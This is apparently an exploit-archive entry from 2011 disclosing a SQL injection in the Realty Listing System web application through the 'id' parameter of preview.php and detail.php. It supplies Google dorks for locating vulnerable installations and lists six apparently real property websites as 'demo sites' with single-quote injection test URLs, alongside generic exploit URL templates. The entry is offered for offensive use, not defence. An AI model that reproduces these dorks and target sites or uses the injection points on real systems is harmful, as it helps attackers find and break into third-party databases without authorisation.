# Exploit Title:Realty Listing System sql Injection Vulnerability
# Date: 8/7/2011
# Author: Angel Injection
# home Page: http://www.club-h.co.cc
# Email: Angel-Injection[at]hotmail[Dot]com
# Vendor or Software Link: http://www.realtylistingsystem.com/
# Version: N/A
# Category:: webapps
# Google dork:intext:"Website powered by the Realty Listing System." inurl:preview.php?id=
# 0r intext:"Website powered by the Realty Listing System." inurl:detail.php?id=
# Tested on: Linux Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Exploit In File

preview.php?id=
detail.php?id=

Demo Site
http://www.bundyinc.com/preview.php?id=1%27
http://clockworkrealty.com/preview.php?id=1%27
http://www.smithrealtyonline.com/preview.php?id=1%27
http://www.kenkoprealty.com/preview.php?id=1%27
http://www.zoellerag.com/preview.php?id=1%27
http://www.timandjim.com/preview.php?id=1%27

exploit
http://target/[path]/preview.php?id=1

0r
http://target/[path]/detail.php?id=1

Demo
http://target/[path]/detail.php?id=1 Injection Here
http://target/[path]/preview.php?id=1 Injection Here


-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Thanks to all the people of Iraq And Club Hack Team